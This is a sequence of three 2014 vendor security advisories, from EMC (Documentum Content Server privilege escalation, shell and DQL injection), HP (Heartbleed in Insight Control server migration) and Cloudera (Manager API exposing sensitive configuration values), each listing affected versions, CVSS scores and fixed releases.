-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ESA-2014-046: EMC Documentum Content Server Multiple Vulnerabilities EMC Identifier: ESA-2014-046 CVE Identifier: CVE-2014-2506, CVE-2014-2507, CVE-2014-2508 Severity Rating: CVSS v2 Base Score: See below for individual scores Affected products: All EMC Documentum Content Server versions of 7.1 All EMC Documentum Content Server versions of 7.0 All EMC Documentum Content Server versions of 6.7 SP2 All EMC Documentum Content Server versions of 6.7 SP1 All EMC Documentum Content Server versions prior to 6.7 SP1 Summary: EMC Documentum Content Server contains fixes for multiple security vulnerabilities that could be potentially exploited by malicious users to compromise the affected system. Details: EMC Documentum Content Server may be susceptible to the following vulnerabilities: Privilege Escalation (CVE-2014-2506): Authenticated non-privileged users are allowed to create system objects with super user privileges due to improper authorization checks being performed on these objects. This could be potentially exploited by a malicious attacker to gain unauthorized access to data or to perform unauthorized actions on Content Server. CVSS v2 Base Score: 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C) Shell Injection (CVE-2014-2507): Certain methods in Documentum Content Server perform improper validation checks on input arguments. This may be potentially exploited by an authenticated malicious user to conduct shell injection attacks against these methods and perform unauthorized actions on Content Server. CVSS v2 Base Score: 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C) DQL Injection (CVE-2014-2508): Certain DQL hints in Documentum Content Server may be potentially exploited by an authenticated malicious user to conduct DQL injection attacks and perform unauthorized database actions. CVSS v2 Base Score: 7.5 (AV:N/AC:M/Au:S/C:C/I:P/A:P) Resolution: The following versions contain the security fixes to address these vulnerabilities: EMC Documentum Content Server version 7.1 P05 and later EMC Documentum Content Server version 7.0 P15 and later EMC Documentum Content Server version 6.7 SP2 P14 and later EMC Documentum Content Server version 6.7 SP1 P28 and later EMC strongly recommends all customers to upgrade to one of the above versions at the earliest opportunity. Link to remedies: Registered EMC Online Support customers can download patches and software from support.emc.com at: https://support.emc.com/downloads/2732_Documentum-Server Credits: EMC would like to thank Pedro Laguna, from Pentura for reporting the issue CVE-2014-2508. Read and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867. For an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. EMC Corporation distributes EMC Security Advisories, in order to bring to the attention of users of the affected EMC products, important security information. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided as is without warranty of any kind. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. Product Security Response Center security_al...@emc.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.13 (Cygwin) iEYEARECAAYFAlOQmakACgkQtjd2rKp+ALzBcQCgshLBocdrvA6UH2IAyjDsHYYa YewAoJ5UZYXcq4/82399vLkSyTzhGPJ/ =ZbuL -END PGP SIGNATURE-
[security bulletin] HPSBMU03029 rev.2 - HP Insight Control Server Migration running OpenSSL, Remote Disclosure of Information
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04268240 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04268240 Version: 2 HPSBMU03029 rev.2 - HP Insight Control Server Migration running OpenSSL, Remote Disclosure of Information NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2014-04-30 Last Updated: 2014-06-02 Potential Security Impact: Remote disclosure of information Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP Insight Control server migration running OpenSSL. This is the OpenSSL vulnerability known as Heartbleed which could be exploited remotely resulting in disclosure of information. Note: additional information regarding the OpenSSL Heartbleed vulnerability concerning HP Servers products is available at the following HP Customer Notice: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n a-c04239413 References: CVE-2014-0160, SSRT101543 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Insight Control server migration v7.3 and v7.3.1 BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2014-0160(AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has addressed this vulnerability for HP Insight Control server migration in the following software update. HP Insight Management 7.3.0a available at the following location: http://www.hp.com/go/insightupdates HISTORY Version:1 (rev.1) - 30 April 2014 Initial release Version:2 (rev.2) - 2 June 2014 Added software update information Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.19 (GNU/Linux) iEYEARECAAYFAlOMs5YACgkQ4B86/C0qfVncZgCg+JL5lNvUl0isNv3/w+fneH6j sqUAoLgdIVM5Sp0raz7M30KsQQBeSTx2 =JPhC -END PGP SIGNATURE-
Details for CVE-2014-0220
-- Technical Service Bulletin 2014-28 (TSB) Title: Security Vulnerability: Sensitive Configuration Values Exposed in Cloudera Manager Certain configuration values that are stored in Cloudera Manager are considered 'sensitive', such as database passwords. These configuration values are expected to be inaccessible to non-admin users, and this is enforced in the Cloudera Manager Admin Console. However, these configuration values are not redacted when reading them through the API, possibly making them accessible to users who should not have such access. Products affected: Cloudera Manager Releases affected: Cloudera Manager 4.8.2 and lower, Cloudera Manager 5.0.0 Users Affected: Cloudera Manager installations with non-admin users Date/time of detection: May 7, 2014 Severity: High Impact: Through the API only, non-admin users can access potentially sensitive configuration information CVE: CVE-2014-0220 Immediate action required: See the following knowledge base article: Security Vulnerability: Sensitive Configuration Values Exposed in Cloudera Manager ETA for resolution: May 13, 2014 Addressed in release/refresh/patch: Cloudera Manager 4.8.3 and 5.0.1 --
